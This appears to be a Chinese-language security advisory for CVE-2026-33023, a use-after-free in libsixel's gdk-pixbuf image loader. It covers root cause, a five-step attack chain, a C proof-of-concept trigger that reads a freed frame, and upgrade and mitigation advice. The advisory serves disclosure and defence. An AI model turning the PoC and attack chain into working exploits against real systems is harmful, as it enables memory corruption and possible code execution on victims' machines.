CVE-2026-33023 libsixel释放后重用漏洞

漏洞信息

漏洞编号

CVE-2026-33023

漏洞类型

释放后重用 (Use-After-Free)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

libsixel

漏洞概述

libsixel是一个SIXEL图像编码/解码器实现。在1.8.7及更早版本中，如果使用--with-gdk-pixbuf2选项构建，loader.c文件中的load_with_gdkpixbuf()函数存在释放后重用漏洞。问题在于清理路径手动释放了sixel_frame_t对象及其内部缓冲区，未遵循引用计数机制，导致回调持有的指针变为悬空指针。攻击者可利用特制图像触发此漏洞，可能造成信息泄露、内存破坏甚至代码执行。

技术细节

该漏洞的根本原因在于代码库中清理策略的不一致性。sixel_frame_t对象是通过引用计数构造函数sixel_frame_new()创建的，并暴露给公共回调。在正常的清理路径（如load_with_builtin()）中，系统使用sixel_frame_unref()来管理生命周期。但在load_with_gdkpixbuf()函数中，清理代码绕过了引用计数机制，直接手动调用free()释放了sixel_frame_t对象及其内部缓冲区。当公共回调调用sixel_frame_ref(frame)试图保留逻辑上有效的引用时，由于主函数load_with_gdkpixbuf()返回后内存已被释放，回调将持有一个悬空指针。任何后续对该帧或其字段的访问都会触发释放后重用（UAF）条件，攻击者可通过特制的图像文件利用此漏洞进行内存破坏，进而可能实现任意代码执行。AddressSanitizer能够确认此内存错误。

攻击链分析

STEP 1

1. 漏洞准备

攻击者制作一个特制的图像文件，该文件在经过libsixel处理时会触发特定的代码路径。

STEP 2

2. 诱导交互

攻击者将特制图像发送给目标用户，或将其放置在目标系统会自动处理的目录中，诱导用户打开或加载该图像。

STEP 3

3. 触发漏洞

受害者的应用程序调用libsixel的load_with_gdkpixbuf()函数处理图像。该函数创建sixel_frame_t对象并传递给回调函数。

STEP 4

4. 内存释放

回调函数可能增加引用计数，但load_with_gdkpixbuf()在返回前错误地直接释放了对象内存，导致引用失效。

STEP 5

5. 利用后果

当程序后续尝试访问该对象（例如回调函数后续逻辑或程序清理时）触发Use-After-Free，导致程序崩溃、信息泄露或任意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <libsixel.h>
#include <stdio.h>

// Global pointer to simulate the dangling reference
sixel_frame_t *global_frame = NULL;

// Callback function intended to retain the frame
int malicious_callback(sixel_frame_t *frame, void *data) {
    printf("Callback invoked. Incrementing reference count.\n");
    // The callback increments the ref count, expecting the object to stay alive
    sixel_frame_ref(frame);
    
    // Store the pointer for later use
    global_frame = frame;
    return 0;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <crafted_image.six>\n", argv[0]);
        return 1;
    }

    printf("Loading crafted image...\n");
    // This function calls load_with_gdkpixbuf which triggers the bug
    // It creates the frame, calls the callback, then incorrectly frees the frame.
    int result = sixel_helper_load_image_file(argv[1], malicious_callback, NULL);

    if (result != 0) {
        printf("Load failed (expected).\n");
    }

    // At this point, load_with_gdkpixbuf has returned and free()'d the frame.
    // However, global_frame still points to the freed memory.
    printf("Attempting to access the freed frame...\n");
    
    if (global_frame) {
        // This access triggers the Use-After-Free
        // Depending on the allocator state, this may crash or lead to code execution
        int width = sixel_frame_get_width(global_frame);
        printf("Frame width: %d (Crash or corruption likely occurred here)\n", width);
    }

    return 0;
}

影响范围

libsixel <= 1.8.7

防御指南

临时缓解措施

建议立即升级到libsixel 1.8.7-r1版本以修复此漏洞。如果暂时无法升级，应在编译libsixel时禁用gdk-pixbuf2支持，并避免打开来源不明的图像文件，以减少被攻击的风险。